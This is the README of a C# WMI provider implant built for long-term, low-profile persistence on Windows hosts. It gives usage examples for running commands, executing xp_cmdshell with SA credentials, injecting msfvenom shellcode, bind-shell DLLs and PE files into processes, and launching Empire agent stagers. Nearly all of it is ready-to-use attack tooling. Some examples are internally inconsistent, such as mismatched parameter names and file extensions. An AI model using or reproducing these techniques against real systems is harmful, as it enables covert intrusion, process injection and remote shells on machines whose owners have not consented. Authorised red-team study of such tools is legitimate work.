WheresMyImplant: A C# WMI Provider for long term persistance
This WMI provider includes functions to execute commands, payloads, and Empire Agent to maintain a low profile on the host.
This is related to the project PowerProvider - https://github.com/0xbadjuju/PowerProvider/
PowerProvider provides the deployment methods for the implant.
To compile, generate your signing key with the command: sn -k sgKey.snk
While primarily designed for use with WMI, WheresMyImplant can also be used with PowerShell reflection: [System.Reflection.Assembly]::LoadFile("C:\temp\WheresMyImplant.dll") [WheresMyImplant.Implant]::InjectShellCode($payload,9976)
Methods
-
RunCMD
- Parameters: Command, Parameters
- Example:
Invoke-CimMethod -Class Win32_Implant -Name RunPowerShell -Argument @{
command="ipconfig";
parameter="/all"
};
-
RunPowerShell
- Parameters: Command
- Example:
Invoke-CimMethod -Class Win32_Implant -Name RunPowerShell -Argument @{
command="whoami"
};
-
RunXpCmdShell
- Parameters: Server, Database, UserName, Password, Command
- Example:
Invoke-CimMethod -Class Win32_Implant -Name RunXpCmdShell -Argument @{
command="whoami";
database="";
server="sqlserver"
username="sa";
password="password"
};
-
InjectShellCode
- Parameter: ShellCodeString, ProcessId
- Example:
msfvenom -p windows/x64/exec --format csharp CMD=calc.exe > file.txt
Delete the byte declaration.
Invoke-CimMethod -Class Win32_Implant -Name InjectShellCode -Argument @{
shellCodeString=$payload;
processId=432
};
-
InjectShellCodeWMFIFSB4
- Parameters: WmiClass, FileName, ProcessId
- Example:
msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeWMFIFSB4 -Argument @{
WmiClass="WMIFS";
FileName="CalcShellCode";
processId=432;
};
-
InjectDll
- Parameters: Library, ProcessId
- Example:
msfvenom -p windows/x64/shell_bind_tcp --format dll --arch x64 > /tmp/bind64.dll
Invoke-CimMethod -ClassName Win32_Implant -Name InjectDll -Arguments @{
library = "\host\share\bind64.dll";
processId = 3372;
};
-
InjectDllWMIFS
- Parameters: WmiClass, FileName, ProcessId
- Example:
msfvenom -p windows/x64/shell_bind_tcp --format dll --arch x64 > /tmp/bind64.dll
Invoke-CimMethod -ClassName Win32_Implant -Name InjectDllWMIFS -Arguments @{
WmiClass = "WMIFS";
FileName = "bind64.dll";
processId = 3372;
};
-
InjectPeFile
- Parameters: FileName, Parameters, ProcessId
- Example:
msfvenom -p windows/x64/shell_bind_tcp --format exe --arch x64 > /tmp/bind64.dll
Invoke-CimMethod -ClassName Win32_Implant -Name InjectPe -Arguments @{
FileName = "C:\bind64.exe";
Parameters = "";
ProcessId=5648;
};
-
InjectPeString
- Parameters: PeString, Parameters, ProcessId
- Example:
msfvenom -p windows/x64/shell_bind_tcp --format exe --arch x64 > /tmp/bind64.dll
Invoke-CimMethod -ClassName Win32_Implant -Name InjectPeString -Arguments @{
FileName = "C:\bind64.exe";
Parameters = "";
ProcessId=5648;
};
-
InjectPeWMIFS
- Parameters: WmiClass, FileName, Parameters, ProcessId
- Example:
msfvenom -p windows/x64/shell_bind_tcp --format exe --arch x64 > /tmp/bind64.dll
Invoke-CimMethod -ClassName Win32_Implant -Name InjectPeFromFileRem -Arguments @{
FileName = "C:\bind64.exe";
Parameters = ""; ProcessId=5648;
};
-
Empire
- Parameters: Server, StagingKey, Language
- Example:
Invoke-CimMethod -ClassName Win32_Implant -Name EmpireStager -Arguments @{
Server = $Server;
StagingKey = $StagingKey;
Language = "PowerShell";
};
Invoke-CimMethod -ClassName Win32_Implant -Name EmpireStager -Arguments @{
Server = $Server;
$StagingKey = $StagingKey;
Language = "dotnet";
};
Author, Contributors, and License
Author: Alexander Leary (@0xbadjuju), NetSPI - 2017
License: BSD 3-Clause
Required Dependencies: None